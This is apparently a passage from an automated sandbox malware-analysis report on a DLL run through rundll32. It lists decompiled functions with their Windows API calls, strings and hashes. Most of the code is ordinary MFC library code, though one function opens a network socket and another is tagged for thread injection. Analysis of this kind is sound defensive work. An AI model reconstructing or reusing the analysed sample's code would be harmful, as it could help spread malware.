						_t94 = E10014B42();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x1001aa48
0x1001aa48
0x1001aa4f
0x1001aa52
0x1001aa5a
0x1001aa5d
0x1001aa62
0x1001aa70
0x1001aa82
0x1001aa72
0x1001aa75
0x1001aa75
0x1001aa88
0x1001aa8c
0x1001aa98
0x1001aaa0
0x1001aaa2
0x1001aaa2
0x1001aaa0
0x1001aa64
0x1001aa64
0x1001aa64
0x1001aa64
0x1001aaa4
0x1001aab2
0x1001aabb
0x1001ab5b
0x1001ab62
0x1001ab69
0x1001ab73
0x1001aac1
0x1001aac3
0x1001aac8
0x1001aad3
0x1001aadc
0x1001aadc
0x1001aad3
0x1001aae0
0x1001aae7
0x1001ab28
0x1001ab37
0x1001ab44
0x1001aae9
0x1001aae9
0x1001aaf0
0x1001aaf2
0x1001aaf2
0x1001ab02
0x1001ab15
0x1001ab1f
0x1001ab1f
0x1001aae7
0x1001ab82
0x1001ab87
0x1001ab8c
0x1001ab90
0x1001ab93
0x1001ab9a
0x1001aba2
0x1001abaa
0x1001abb2
0x1001abb9
0x1001abbe
0x1001abca
0x1001abd2
0x1001abd2
0x1001abc0
0x1001abc0
0x1001abc0
0x1001abd8
0x1001abe7
0x1001abef
0x1001abef
0x1001abda
0x1001abda
0x1001abda
0x1001ac07

APIs

Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB

GetParent.USER32(?), ref: 1001AA75
SendMessageA.USER32 ref: 1001AA98
GetWindowRect.USER32 ref: 1001AAB2
GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
CopyRect.USER32(?,?), ref: 1001AB15
CopyRect.USER32(?,?), ref: 1001AB1F
GetWindowRect.USER32 ref: 1001AB28
CopyRect.USER32(?,?), ref: 1001AB44

Strings

(, xrefs: 1001AAE0

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 100161DE
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
CloseHandle.KERNEL32(?), ref: 1001625C
SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
CloseHandle.KERNEL32(?), ref: 10016280
CloseHandle.KERNEL32(00000002), ref: 100162A2

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
String ID:
API String ID: 3191170017-0
Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61

Uniqueness

Uniqueness Score: -1.00%

Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F

Strings

CreateActCtxA, xrefs: 10014572
KERNEL32, xrefs: 10014555
ActivateActCtx, xrefs: 10014587
DeactivateActCtx, xrefs: 10014594
ReleaseActCtx, xrefs: 1001457A

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22

Uniqueness

Uniqueness Score: -1.00%

Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10017375
FindResourceA.KERNEL32 ref: 100173A8
LoadResource.KERNEL32(?,00000000), ref: 100173B0
LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
GetDesktopWindow.USER32 ref: 100173F4
IsWindowEnabled.USER32(000000FF), ref: 10017402
EnableWindow.USER32(000000FF,00000000), ref: 10017411

Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8

Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7

EnableWindow.USER32(000000FF,00000001), ref: 100174ED
GetActiveWindow.USER32 ref: 100174F8
SetActiveWindow.USER32(000000FF), ref: 10017506
FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1001C7D8
GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841

Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C

SetWindowLongA.USER32 ref: 1001C868
RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E

Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2

Strings

AfxOldWndProc423, xrefs: 1001C7E0, 1001C7E5, 1001C86E, 1001C876

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65

Uniqueness

Uniqueness Score: -1.00%

Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON

Download Yara Rule

APIs

Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9

inet_addr.WS2_32(?), ref: 10012ECA
htons.WS2_32(00001C1F), ref: 10012EF0

Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8

WSAStartup.WS2_32(00000202,?), ref: 10012F58
_printf.LIBCMT ref: 10012F79
socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
WSACleanup.WS2_32 ref: 10012FB6

Strings

Please enter your name, xrefs: 10012F3D
error, xrefs: 10012FAC
WSAStartup function failed with error: %d, xrefs: 10012F74

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
String ID: Please enter your name$WSAStartup function failed with error: %d$error
API String ID: 4222005279-2156106531
Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55

Uniqueness

Uniqueness Score: -1.00%

Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
__lock.LIBCMT ref: 10035229
___addlocaleref.LIBCMT ref: 10035248

Strings

KERNEL32.DLL, xrefs: 100351C1
EncodePointer, xrefs: 100351E3
DecodePointer, xrefs: 100351F7

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1036688887-2843748187
Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10017185
GetSystemMetrics.USER32 ref: 10017236
GlobalLock.KERNEL32 ref: 1001729F
CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE

Strings

MS Shell Dlg, xrefs: 10017240

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 10021EFD
GetStockObject.GDI32(0000000D), ref: 10021F05
GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
GetDC.USER32(00000000), ref: 10021F21
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
MulDiv.KERNEL32 ref: 10021F41
ReleaseDC.USER32(00000000,00000000), ref: 10021F4D

Strings

System, xrefs: 10021EF8, 10021F62

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 100209F4
EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
TlsGetValue.KERNEL32 ref: 10020A23
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
_memset.LIBCMT ref: 10020AE2
TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81

Uniqueness

Uniqueness Score: -1.00%

Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10025BAC

Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
GlobalLock.KERNEL32 ref: 10025DB2
GlobalUnlock.KERNEL32(?), ref: 10025DCA
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 10014A3F
lstrcmpA.KERNEL32(?,?), ref: 10014A4B
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
GlobalLock.KERNEL32 ref: 10014A8F
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4

Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728

Uniqueness

Uniqueness Score: -1.00%

Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 10020F3B
GetSystemMetrics.USER32 ref: 10020F42
GetSystemMetrics.USER32 ref: 10020F49
GetSystemMetrics.USER32 ref: 10020F53
GetDC.USER32(00000000), ref: 10020F5D
GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
ReleaseDC.USER32(00000000,00000000), ref: 10020F7E

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

